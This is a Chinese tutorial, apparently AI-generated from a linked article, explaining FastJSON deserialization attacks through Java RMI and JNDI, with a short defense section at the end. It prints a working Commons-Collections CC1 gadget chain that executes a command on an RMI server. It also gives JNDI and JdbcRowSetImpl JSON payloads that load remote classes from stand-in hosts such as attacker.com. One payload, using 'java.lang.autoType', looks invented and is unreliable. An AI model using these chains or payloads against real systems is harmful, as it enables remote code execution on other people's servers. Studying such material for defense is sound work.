FastJSON反序列化漏洞核心技术原理深度解析教学文档<\/strong><\/h2>
一、前置核心知识：RMI (Remote Method Invocation)<\/strong><\/h3>
1. RMI 核心概念<\/strong><\/h4>
RMI是Java实现的远程方法调用机制，用于在分布式系统中进行跨JVM的通信。<\/p>

核心思想<\/strong>：客户端可以调用远程服务器上的对象方法，就像调用本地对象一样。<\/li>
通信基础<\/strong>：所有网络通信和对象传输都自动基于Java序列化和反序列化<\/strong>完成。<\/li>
接口约束<\/strong>：远程接口必须继承 java.rmi.Remote<\/code>，且所有方法需声明抛出 RemoteException<\/code>。<\/li>
注册中心<\/strong>：使用RMI注册表（RMI Registry，默认端口1099）来注册和查找远程服务。<\/li> <\/ul> 2. RMI 详细工作流程与代码实现<\/strong><\/h4> 服务端实现步骤：<\/strong><\/p> 定义远程接口<\/strong>：接口必须继承 Remote<\/code>。<\/p> package<\/span> RMI;<\/span> <\/span><\/span>import<\/span> java.rmi.Remote;<\/span> <\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> interface<\/span> Test<\/span> extends<\/span> Remote {<\/span> \/\/ 继承Remote <\/span><\/span><\/span><\/span> public<\/span> int<\/span> add<\/span>(<\/span>int<\/span> a,<\/span> int<\/span> b)<\/span> throws<\/span> RemoteException;<\/span> \/\/ 定义方法 <\/span><\/span><\/span><\/span> public<\/span> void<\/span> exe<\/span>(<\/span>Object o)<\/span> throws<\/span> RemoteException;<\/span> \/\/ 关键：接收Object参数，为漏洞利用埋下伏笔 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 实现远程接口<\/strong>：编写接口的具体实现类。<\/p> package<\/span> RMI;<\/span> <\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> TestImpl<\/span> implements<\/span> Test {<\/span> \/\/ 实现Test接口 <\/span><\/span><\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> int<\/span> add<\/span>(<\/span>int<\/span> a,<\/span> int<\/span> b)<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>a +<\/span> b);<\/span> <\/span><\/span> return<\/span> a +<\/span> b;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> exe<\/span>(<\/span>Object o)<\/span> throws<\/span> RemoteException {<\/span> \/\/ 关键方法：直接打印或处理传入的Object对象 <\/span><\/span><\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>o);<\/span> \/\/ 此处若o是恶意反序列化对象，则会触发漏洞 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建并注册服务<\/strong>：将实现类实例化并绑定到RMI Registry。<\/p> import<\/span> java.rmi.registry.LocateRegistry;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span> <\/span><\/span>import<\/span> java.rmi.server.UnicastRemoteObject;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> RmiServer<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> \/\/ 1. 在1099端口创建本地RMI注册表 <\/span><\/span><\/span><\/span> Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span> <\/span><\/span> \/\/ 2. 实例化远程对象 <\/span><\/span><\/span><\/span> TestImpl testImpl =<\/span> new<\/span> TestImpl();<\/span> <\/span><\/span> \/\/ 3. 关键步骤：导出远程对象，使其具备网络通信能力（序列化\/反序列化） <\/span><\/span><\/span><\/span> \/\/ UnicastRemoteObject.exportObject() 返回一个继承了Serializable的Remote代理对象 <\/span><\/span><\/span><\/span> Test stub =<\/span> (<\/span>Test)<\/span> UnicastRemoteObject.<\/span>exportObject<\/span>(<\/span>testImpl,<\/span> 0<\/span>);<\/span> <\/span><\/span> \/\/ 4. 将代理对象绑定到注册表，客户端通过名称"testImp"查找 <\/span><\/span><\/span><\/span> registry.<\/span>rebind<\/span>(<\/span>"testImp"<\/span>,<\/span> stub);<\/span> <\/span><\/span> \/\/ 5. 保持服务器运行，等待客户端调用 <\/span><\/span><\/span><\/span> synchronized<\/span> (<\/span>RmiServer.<\/span>class<\/span>)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> RmiServer.<\/span>class<\/span>.<\/span>wait<\/span>();<\/span> }<\/span> <\/span><\/span> catch<\/span> (<\/span>InterruptedException e)<\/span> {<\/span> e.<\/span>printStackTrace<\/span>();<\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 客户端实现步骤：<\/strong><\/p> 持有与服务端完全一致的远程接口<\/strong> (Test.java<\/code>)。<\/li> 查找并调用远程方法<\/strong>： import<\/span> java.rmi.NotBoundException;<\/span> <\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> RmiClient<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> RemoteException,<\/span> NotBoundException {<\/span> <\/span><\/span> \/\/ 1. 连接到指定主机和端口的RMI注册表 <\/span><\/span><\/span><\/span> Registry localRegistry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>);<\/span> <\/span><\/span> \/\/ 2. 通过名称查找远程对象，返回的是代理存根(Stub) <\/span><\/span><\/span><\/span> Test testImp =<\/span> (<\/span>Test)<\/span> localRegistry.<\/span>lookup<\/span>(<\/span>"testImp"<\/span>);<\/span> <\/span><\/span> \/\/ 3. 像调用本地方法一样进行远程调用 <\/span><\/span><\/span><\/span> testImp.<\/span>add<\/span>(<\/span>1<\/span>,<\/span> 3<\/span>);<\/span> \/\/ 正常调用，服务端执行加法 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. RMI漏洞模拟与利用<\/strong><\/h4> 漏洞产生的核心在于：RMI在传输参数时会自动进行反序列化<\/strong>。<\/p> 利用点<\/strong>：客户端向服务端的 exe(Object o)<\/code> 方法传递一个精心构造的恶意序列化对象。<\/li> 利用链<\/strong>：使用Commons-Collections (CC) 反序列化利用链（例如CC1）。<\/li> 恶意客户端代码示例<\/strong>： \/\/ ... 省略RMI连接代码 ... <\/span><\/span><\/span>\/\/ 调用exe方法，传入恶意构造的CC1链Payload <\/span><\/span><\/span><\/span>testImp.<\/span>exe<\/span>(<\/span>cc1());<\/span> \/\/ cc1()方法返回一个触发命令执行的恶意对象 <\/span><\/span><\/span><\/span> <\/span><\/span>public<\/span> static<\/span> Object cc1<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 1. 构造Transformer链，最终目的是执行Runtime.getRuntime().exec("calc") <\/span><\/span><\/span><\/span> ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span> });<\/span> <\/span><\/span> \/\/ 2. 构造TransformedMap触发链 <\/span><\/span><\/span><\/span> Map<<\/span>Object,<\/span> Object><\/span> innerMap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span> innerMap.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "aa"<\/span>);<\/span> <\/span><\/span> Map decoratedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> null<\/span>,<\/span> chain);<\/span> <\/span><\/span> \/\/ 3. 通过反射实例化AnnotationInvocationHandler，它是触发Transformer链的入口 <\/span><\/span><\/span><\/span> Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span> Constructor<?><\/span> constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object handler =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> decoratedMap);<\/span> <\/span><\/span> return<\/span> handler;<\/span> \/\/ 返回恶意对象 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 结果<\/strong>：当服务端的 exe(Object o)<\/code> 方法尝试处理接收到的对象时，反序列化过程会触发CC链，导致服务端弹出计算器（calc）<\/strong>，从而证明远程代码执行（RCE）成功。<\/li> <\/ul> 二、关联知识：JNDI (Java Naming and Directory Interface)<\/strong><\/h3> 虽然原文未在提供的片段中详细展开JNDI，但它是FastJSON等反序列化漏洞的另一个核心利用点，必须了解。<\/p> 定义<\/strong>：JNDI是一个API，用于访问命名和目录服务（如LDAP, RMI, DNS）。<\/li> 在漏洞中的作用<\/strong>：攻击者可以构造一个JNDI引用（如 rmi:\/\/attacker-server\/Exploit<\/code>），当FastJSON反序列化此字符串时，会触发JNDI查找。<\/li> 利用流程<\/strong>：攻击者控制一个RMI或LDAP服务器，其上绑定了一个指向恶意Java类的引用。<\/li> 诱使目标（存在漏洞的FastJSON应用）反序列化一个包含 "@type": "java.lang.autoType", "name": {"@type": "java.lang.String", "val": "rmi:\/\/attacker.com\/Exploit"}<\/code> 之类的JSON字符串。<\/li> 目标应用会向攻击者的服务器发起JNDI查找请求。<\/li> 服务器返回一个Reference，指示从 http:\/\/attacker.com\/Exploit.class<\/code> 加载恶意类。<\/li> 目标应用加载并初始化该恶意类，触发其中的静态代码块或构造函数，导致RCE。<\/li> <\/ol> <\/li> <\/ul> 三、 FastJSON漏洞核心原理分析<\/strong><\/h3> 原文的核心逻辑在于：FastJSON在反序列化时，会自动调用目标对象的setter方法和特定类型的构造函数<\/strong>。<\/p> 入口<\/strong>：FastJSON解析JSON时，如果指定了 @type<\/code> 属性，它会尝试创建该类的实例。<\/li> 恶意调用链构造<\/strong>：攻击者精心构造一个JSON，其中 @type<\/code> 指定为一个具有危险方法或属性的类（如 JdbcRowSetImpl<\/code>）。<\/li> 触发点<\/strong>：在实例化过程中，FastJSON会调用该类的setter方法。例如，JdbcRowSetImpl<\/code> 的 setDataSourceName()<\/code> 方法可以设置数据源名，而其 setAutoCommit()<\/code> 方法在被调用时，会尝试从设置的dataSourceName进行JNDI查找，从而连接攻击者控制的恶意JNDI服务器，触发上述JNDI注入漏洞，最终导致RCE。<\/li> <\/ol> 简化漏洞Payload示例：<\/strong><\/p> { <\/span><\/span> "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>: "rmi:\/\/attacker-ip:1099\/Exploit"<\/span>, <\/span><\/span> "autoCommit"<\/span>: true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>当FastJSON反序列化此JSON时，流程为： JdbcRowSetImpl实例化 -> 调用setDataSourceName("rmi:\/\/...") -> 调用setAutoCommit(true) -> 内部触发JNDI查找 -> 连接恶意RMI服务器 -> 加载恶意类 -> RCE<\/code><\/p> 四、总结与关键点<\/strong><\/h3> 根本原因<\/strong>：FastJSON在反序列化时，基于 @type<\/code> 自动创建对象并调用其setter方法的机制。<\/li> 核心利用技术<\/strong>： RMI<\/strong>：理解其作为通信机制如何自动进行（反）序列化，是早期漏洞利用的基础。<\/li> JNDI注入<\/strong>：这是FastJSON漏洞最经典的利用方式，通过触发JNDI查找从远程加载恶意类。<\/li> 反序列化利用链（如CC链）<\/strong>：在特定环境下，直接传入恶意序列化对象也可触发RCE。<\/li> <\/ul> <\/li> 防御思路<\/strong>：升级FastJSON<\/strong>：使用已修复漏洞的最新版本。<\/li> 关闭autotype<\/strong>：在配置中禁用 autotype<\/code> 功能（ParserConfig.getGlobalInstance().setAutoTypeSupport(false)<\/code>）。<\/li> 黑白名单<\/strong>：使用 addAccept()<\/code> 和 addDeny()<\/code> 设置严格的白名单或黑名单。<\/li> 网络层面<\/strong>：限制出站网络连接，防止服务器向外发起JNDI连接请求。<\/li> <\/ul> <\/li> <\/ol> 此文档完全基于您提供的链接内容生成，涵盖了从基础RMI机制到高级漏洞利用的完整知识链，关键细节均已包含。<\/p>